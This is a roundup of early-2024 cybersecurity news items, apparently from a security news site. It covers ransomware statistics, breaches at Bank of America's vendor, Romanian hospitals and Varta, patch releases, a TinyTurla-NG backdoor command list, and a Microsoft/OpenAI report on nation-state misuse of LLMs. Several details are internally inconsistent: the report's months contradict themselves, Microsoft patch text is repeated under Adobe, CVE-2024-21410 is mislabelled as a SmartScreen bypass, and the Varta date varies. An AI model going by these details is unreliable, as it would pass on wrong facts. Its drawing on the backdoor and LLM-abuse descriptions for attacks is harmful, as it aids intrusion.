Maintainers behind the Ransomfeed platform have released Q3 Report 2023 including activities of 185 criminal groups operating worldwide.
A comprehensive report delving into the intricate landscape of ransomware threats during the last four months of 2023 is out, with a meticulous focus on the monitoring activities conducted by the OSINT Ransomfeed platform (www.ransomfeed.it). Throughout this period, the platform diligently tracked 185 criminal groups operating worldwide, meticulously tracing 342 servers employed for ransomware activities. The data collected unearthed a total of 1771 ransomware claims, with 55 recorded incidents in Italy. This report meticulously scrutinizes the geographical localization of these attacks, as well as the industries predominantly targeted.
As customary, the ensuing data, as reiterated, were procured via the primary activity of the Ransomfeed platform, involving periodic scraping from various renowned dark websites. For this report, the focus is directed toward the outcomes gathered concerning the third quarter of the past year, commencing with a global overview encompassing all monitored ransomware groups and culminating with a specific emphasis on Italy.
During this period of 2023, the platform meticulously monitored 185 cybercriminal groups operating with ransomware technologies across over 342 servers and mirrors, consequently tallying a definition of 1771 ransomware claims identified globally.
The months of May, June, July, and August each presented unique challenges in the realm of cybersecurity. Remarkably, December emerged as the most prolific month of the four months with 484 attacks, closely trailed by November with 482, September with 458, and October with 347. Notably, the year’s end witnessed an escalation in criminal claims, almost akin to concluding a productive year. Let us now delve into the detailed breakdown of the days.
This report offers an exhaustive account of ransomware threats in the third quarter of 2023, spotlighting activities monitored by the OSINT Ransomfeed platform.
In conclusion, the report underscores the paramount importance of international collaboration and the adoption of advanced defense strategies to effectively counter the burgeoning phenomenon of ransomware threats and safeguard the integrity of data and information systems.
Ransomfeed trusts this report (results of no-profit activity) will serve as a vital resource for cybersecurity professionals, researchers, and stakeholders alike, providing valuable insights into the evolving ransomware landscape and paving the way for robust defense mechanisms against such malicious activities.
Bank of America revealed that the personal information of some customers was stolen in a data breach affecting a third-party services provider.
Bank of America began notifying some customers following a data breach at the third-party services provider Infosys McCamish System (IMS). The bank has sent notification letters to 57,000 customers, informing them that their personal information has been compromised
Infosys disclosed the security breach on November 3, 2023, in a filing with SEC the company reported it was the victim of a cyberattack that resulted in the non-availability of certain applications and systems.
McCamish immediately launched an investigation into the incident and worked on the remediation with the help of cybersecurity consultants.
The effects of the cyberattack described by the victim suggest it was targeted by a ransomware attack. On November 4, the LockBit ransomware gang claimed responsibility for the attack.
The company restored the impacted systems by December 31, it also estimated the losses caused by the incident will be at least of $30 million.
“On the basis of analysis conducted by the cybersecurity firm, McCamish believes that certain data was exfiltrated by unauthorized third parties during the incident and this exfiltrated data included certain customer data. McCamish has engaged a third-party e- discovery vendor in assessing the extent and nature of such data. This review process is ongoing. McCamish may incur additional costs including indemnities or damages/claims, which are indeterminable at this time.” reads the statement sent to the SEC. “Infosys had previously communicated the occurence of this cybersecurity incident to BSE Limited, National Stock Exchange of India Limited, New York Stock Exchange and to United States Securities and Exchange Commission on November 3, 2023.”
On February 1, Bank of America started notifying 57028 customers impacted by the data breach.
the Maine Attorney General’s Office, Bank of America noted that it cannot determine “with certainty what personal information was accessed” during the attack.
“On or around November 3, 2023, IMS was impacted by a cybersecurity event when an unauthorized third party accessed IMS systems, resulting in the non-availability of certain IMS applications. On November 24, 2023, IMS told Bank of America that data concerning deferred compensation plans serviced by Bank of America may have been compromised. Bank of America’s systems were not compromised.” reads the letter sent to the impacted customers. “It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS. According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”
According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information.
Bank of America states that they are not aware of any misuse involving the compromised information, however, the bank will provide a complimentary two-year membership in an identity theft protection service provided by Experian IdentityWorks.
Authorities in Romania reported that at least 100 hospitals went offline after a ransomware attack hit the Hipocrate platform.
Authorities in Romania confirmed that a ransomware attack that targeted the Hipocrate Information System (HIS) has disrupted operations for at least 100 hospitals.
Hipocrate Information System (HIS) is a software suite designed to manage the medical and administrative activities of hospitals and other healthcare institutions.
The attack took place on February 11 and encrypted data in the production servers.
“During the night of February 11 to 12, 2024, a massive cyber ransomware attack took place on the production servers on which the HIS IT system runs. As a result of the attack, the system is down, files and databases are encrypted.” reported the Romanian Ministry of Health.
The initial number of impacted hospitals was 21, but later the authorities confirmed that the number had increased to 25. Another 79 hospitals took their systems down as a precautionary measure.
Romanian Ministry of Health added that cybersecurity specialists, including cybersecurity experts from the National Cyber Security Directorate, are monitoring the situation. The Romanian government also announced extraordinary preventive measures to prevent other hospitals from being impacted by the incident.
DNSC reported that ransomware operators employed a variant of the Phobos ransomware family known as Backmydata ransomware. The threat actors demand the payment of 3.5 BTC (about 157,000 EURO).
“Hospitals using the HIPOCRATE platform, regardless of whether they were affected or not, have since yesterday received a series of recommendations from the DNSC to properly manage the situation” reported DNSC.
Identify affected systems and immediately isolate them from the rest of the network as well as from the Internet
Keep a copy of the ransom message and any other communications from the attackers. This information is useful to the authorities or for further analysis of the attack
Do not shut down the affected equipment. Stopping it will remove the evidence stored in the volatile memory (RAM)
Collect and keep all relevant log information, from the affected equipment, but also from network equipment, firewall
Examine the system logs to identify the mechanism by which IT infrastructure has been compromised
Immediately inform all employees and notify affected customers and business partners of the incident and its extent
Restore affected systems based on data backups after a full system cleanup has been performed . It is absolutely necessary to ensure that backups are intact, up-to-date and secure against attack
Ensure that all programs, applications and operating systems are updated to the latest versions and that all known vulnerabilities are patched
At this time, it is still unclear if the threat actors have stolen sensitive data from the impacted organizations.
Microsoft Patch Tuesday security updates for February 2024 addressed 72 flaws, two of which are actively exploited in the wild.
Microsoft Patch Tuesday security updates for February 2024 resolved a total of 72 vulnerabilities, including two actively exploited zero-days.
The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.
Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.
The two flaws actively exploited are:
CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:
CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing him to open it.
Below is the list of the critical flaws fixed by Microsoft Patch Tuesday security updates for February 2024.
As usual the ZDI has published the full list of CVEs released by Microsoft for February 2024 here:
Adobe Patch Tuesday security updates for February 2024 addressed more than 30 vulnerabilities in multiple products, including critical issues.
Adobe Patch Tuesday security updates released by Adobe addressed over 30 vulnerabilities across various products, including critical issues.
The software makerwarned of critical flaws in popular products such as Adobe Acrobat and Reader, Adobe Commerce and Magento Open Source, Substance 3D Painter, and FrameMaker.
The company fixed 13 vulnerabilities in the Adobe Acrobat and Reader software, including arbitrary code execution, application denial of service and memory leak vulnerabilities.
“Adobe has released a security update for Adobe Acrobat and Reader for Windows and macOS. This update addresses critical and important vulnerabilities.” reads the advisory. “Successful exploitation could lead to arbitrary code execution, application denial-of-service, and memory leak.”
Below is the list of vulnerabilities addressed by the software vendor:
According to the advisory, the above vulnerabilities can be exploited only by an authenticated attacker.
“Exploit requires admin privileges: The vulnerability is (or is not) only exploitable by an attacker with administrative privileges.” states the advisory.
The good news is that the software vendor is not aware of attacks in the wild exploiting these vulnerabilities.
The vulnerabilities affect Microsoft Windows and Windows Components; Office and Office Components; Azure; .NET Framework and ASP.NET; SQL Server; Windows Hyper-V; and Microsoft Dynamics.
Five vulnerabilities are rated Critical, 65 are rated Important, and two are rated Moderate in severity.
Zoom addressed seven vulnerabilities in its desktop and mobile applications, including a critical flaw (CVE-2024-24691) affecting the Windows software.
The popular Video messaging giant Zoom released security updates to address seven vulnerabilities in its desktop and mobile applications, including a critical issue, tracked as CVE-2024-24691 (CVSS score of 9.6), in Windows software.
The vulnerability CVE-2024-24691 is an improper input validation bug that could be exploited by an attacker with network access to escalate privileges.
“Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access.” reads the advisory.
The vulnerability impacts the following products:
Zoom Desktop Client for Windows before version 5.16.5
Zoom VDI Client for Windows before version 5.16.10 (excluding 5.14.14 and 5.15.12)
Zoom Rooms Client for Windows before version 5.17.0
Zoom Meeting SDK for Windows before version 5.16.5
The company also addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2024-24697, impacting Windows software.
“Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.” reads the advisory.
The issue impacts the following products:
Zoom Desktop Client for Windows before version 5.17.0
Zoom VDI Client for Windows before version 5.17.5 (excluding 5.15.15 and 5.16.12)
Zoom Meeting SDK for Windows before version 5.17.0
Zoom Rooms Client for Windows before version 5.17.0
The video messaging company also resolved a high-severity escalation of privilege defect in these Windows applications, noting that it can be exploited locally, without authentication.
Tracked as CVE-2024-24697 and described as an untrusted search path issue, the vulnerability impacts Desktop Client before version 5.17.0, VDI Client before version 5.17.5 (excluding 5.15.15 and 5.16.12), Meeting SDK before version 5.17.0, and Rooms Client before version 5.17.0.
Researchers reported that attackers can exploit the ‘command-not-found’ utility to trick users into installing rogue packages on Ubuntu systems.
Cybersecurity researchers from cloud security firm Aqua discovered that it is possible to abuse, the popular utility ‘called ‘command-not-found’ that can lead to deceptive recommendations of malicious packages.
“Aqua Nautilus researchers have identified a security issue that arises from the interaction between Ubuntu’s command-not-found package and the snap package repository.” reads the report published by Aqua. “While command-not-found serves as a convenient tool for suggesting installations for uninstalled commands, it can be inadvertently manipulated by attackers through the snap repository, leading to deceptive recommendations of malicious packages.”
The default installation of Ubuntu includes the command-not-found package, it provides suggestions for package installations when users attempt to execute a command in Bash or Zsh that is not available on their system. The command relies on the implementation of the command_not_found_handle function, which Bash invokes when encountering an unrecognized command.
The package provides recommendations for both APT and snap packages. For example, if a user tries to execute “ifconfig” and it’s not installed, the package will suggest installing “net-tools” through apt.
The utility uses a local database located at /var/lib/command-not-found/commands.db to link commands to their corresponding APT packages.
An attacker can claim a Snap name associated with a package for which the maintainers haven’t yet claimed the Snap name. Then the attacker can register a snap name and the upload of a dummy “rogue” package.
“The maintainers of the jupyter-notebook APT package had not claimed the corresponding snap name. This oversight left a window of opportunity for an attacker to claim it and upload a malicious snap named jupyter-notebook.” reads the analysis published by Aqua. “We can observe that the command-not-found utility suggests the snap package first, even before the original APT package. This behavior could potentially mislead users into installing the snap package.”
Moreover, the researchers discovered that up to 26% of commands linked to APT (Advanced Package Tool) packages may be exposed to impersonation. This vulnerability could expose users to supply chain attacks impacting both Linux users and Windows systems running WSL.
The researchers also warn of typosquatting attacks in which attackers requesting commands with typographical errors (e.g., ifconfigg instead of ifconfig) are suggested malicious snap packages that were claimed by the attackers.
“For instance, consider what could occur if a user accidentally types ifconfigg instead of ifconfig” continues the analysis. “the command-not-found package helpfully corrects the user, suggesting the net-tools package for the mistyped ifconfig command. However, the situation becomes more problematic when an attacker capitalizes on these common mistakes by registering a snap with the typo, such as ifconfigg.”
The potential for attackers to exploit the command-not-found utility by suggesting their rogue Snap packages is worrisome.
“It remains uncertain how extensively these capabilities have been exploited, underscoring the urgency for heightened vigilance and proactive defense strategies,” Aqua concludes.
Microsoft and OpenAI warn that nation-state actors are using ChatGPT to automate some phases of their attack chains, including target reconnaissance and social engineering attacks.
Multiple nation-state actors are exploiting artificial intelligence (AI) and large language models (LLMs), including OpenAI ChatGPT, to automate their attacks and increase their sophistication.
According to a study conducted by Microsoft in collaboration with OpenAI, the two companies identified and disrupted operations conducted by five nation-state actors that abused their AI services to carry out their attacks.
The researchers observed the following APT groups using artificial intelligence (AI) and large language models (LLMs) in various phases of their attack chain:
China-linked APT groups Charcoal Typhoon and Salmon Typhoon;
“Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets’ jobs, professional networks, and other relationships.” reads the report published by Microsoft. “Importantly, our research with OpenAI has not identified significant attacks employing the LLMs we monitor closely.”
The researchers pointed out that at this time the attackers have yet to use LLMs to devise novel attacks, malicious use of LLMs observed by the researchers include:
LLM-informed reconnaissance: Employing LLMs to gather actionable intelligence on technologies and potential vulnerabilities.
LLM-enhanced scripting techniques: Utilizing LLMs to generate or refine scripts that could be used in cyberattacks, or for basic scripting tasks such as programmatically identifying certain user events on a system and assistance with troubleshooting and understanding various web technologies.
LLM-aided development: Utilizing LLMs in the development lifecycle of tools and programs, including those with malicious intent, such as malware.
LLM-supported social engineering: Leveraging LLMs for assistance with translations and communication, likely to establish connections or manipulate targets.
LLM-assisted vulnerability research: Using LLMs to understand and identify potential vulnerabilities in software and systems, which could be targeted for exploitation.
LLM-optimized payload crafting: Using LLMs to assist in creating and refining payloads for deployment in cyberattacks.
LLM-enhanced anomaly detection evasion: Leveraging LLMs to develop methods that help malicious activities blend in with normal behavior or traffic to evade detection systems.
LLM-directed security feature bypass: Using LLMs to find ways to circumvent security features, such as two-factor authentication, CAPTCHA, or other access controls.
LLM-advised resource development: Using LLMs in tool development, tool modifications, and strategic operational planning.
Microsoft report details the use of LLMs for each APT group, for instance, the Iranian nation-state actor Crimson Sandstorm (CURIUM) used its AI services to generate various phishing emails, to generate code snippets and for assist in developing code to evade detection.
OpenAI reported that the above APT group used its AI services to carry out the following tasks respectively:
Charcoal Typhoon used our services to research various companies and cybersecurity tools, debug code and generate scripts, and create content likely for use in phishing campaigns.
Salmon Typhoon used our services to translate technical papers, retrieve publicly available information on multiple intelligence agencies and regional threat actors, assist with coding, and research common ways processes could be hidden on a system.
Crimson Sandstorm used our services for scripting support related to app and web development, generating content likely for spear-phishing campaigns, and researching common ways malware could evade detection.
Emerald Sleet used our services to identify experts and organizations focused on defense issues in the Asia-Pacific region, understand publicly available vulnerabilities, help with basic scripting tasks, and draft content that could be used in phishing campaigns.
Forest Blizzard used our services primarily for open-source research into satellite communication protocols and radar imaging technology, as well as for support with scripting tasks.
Microsoft announced principles shaping Microsoft’s policy and actions mitigating the risks associated with the abuse of its AI services by nation-state actors, advanced persistent manipulators (APMs), and cybercriminal syndicates.
The principles include Identification and action against malicious threat actors’ use, Notification to other AI service providers, Collaboration with other stakeholders, and Transparency.
CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:
CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing him to open it.
Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.
A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.
The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.
Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtYpic.twitter.com/x3lskKmBRi
The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.
The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.
The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.
At this time it’s unclear which kind of information was exposed, however, Yoon’s office pointed out that threat actors did compromise the overall office’s security system.
“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”
South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.
North Korea-linked APT groups are also known to be focused on attacks against crypto exchange and financial organizations in South Korea.
Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.
On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta.
On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.
VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.
The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.
The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.
“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”
Impacted production plants are in Germany, Romania and Indonesia, on February 14 the operations at the plants were still blocked.
“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.
At this time, no known ransomware group has claimed responsibility for the attack.
The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.
A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.
The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.
“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”
The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers, it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.
The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021, in November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products. Since September 2022, Moobot botnet was spotted targeting vulnerable D-Link routers.
In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.
The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.
“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”
According to court documents, the government extensively tested the operation on the relevant Ubiquiti Edge OS routers. The DoJ pointed out that apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing factory resets of their routers or accessing their routers through the local network.
Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.
Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.
Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.
TinyTurla-NG was spotted in early December 2023, it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.
“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.
Talos also discovered previously undetected PowerShell dubbed “TurlaPower-NG ” that was designed for data exfiltration. Turla operators used the scripts to exfiltrate keys used to secure the password databases of popular password management software.
The cybersecurity firm identified three different TinyTurla-NG samples, and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that that campaign may have begun as early as November 2023.
Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. Threat actors compromised the websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2. The attackers uploaded PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.
Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.
Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.
The malware supports the following commands:
“changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
“changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
“get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
“post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
“killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat.
The report includes indicators of compromise (IoCs).
U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.
CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.
The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor compromised network administrator credentials through the account of a former employee that was used to successfully authenticate to an internal virtual private network (VPN) access point. Then the attackers made lateral movement and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The government organization also hosts its sensitive data on an Azure environment which was not accessed by the attackers.
“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.
The threat actor likely obtained the employee’s account credentials from a third-party data breach.
The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.
CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.
Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.
The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.
CISA did not attribute the attack to a specific threat actor.
The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.
The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward offer of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.
This additional reward aims to target affiliated and initial access brokers involved and that facilitated the attacks of the group.
On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.
On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.
On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.
The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Germany, Australia, Spain, Austria and Europol.
“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Guttingen.” reads the message published by law enforcement on the seized websites.
“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.
The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.
The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.
“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”
According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.
People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion.
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.
CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability
The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.
The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.
“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication(EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.
The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.
The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.
In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco Cisco ASA and FTD appliances.
“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.
An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.
The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in Cisco Anyconnect SSL VPN was the entry point in at least six of the compromised devices.
“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.
The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.
“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”
On October 2022, Swiss police arrested Penchukov in Geneva, also known as Tank, which is one of the leaders of the JabberZeus cybercrime group.
The man was extradited to the United States in 2023, he was included in the FBI’s “Most Wanted” list and has been sought for 10 years.
In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as JabberZeus crew. JabberZeus was a small cybercriminal ring that was targeting SMBs with a custom-made version of the Zeus banking trojan. At the time, DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules and received alerts once a bank account had been compromised.
The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, was and told him Miloslava birth weight.
Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.
Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections. The late son of former Ukrainian President Victor Yanukovych would serve as godfather to Tank’s daughter Miloslava.
Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced to two years and ten months of incarceration in May 2015 followed by a supervised release of 1 year.
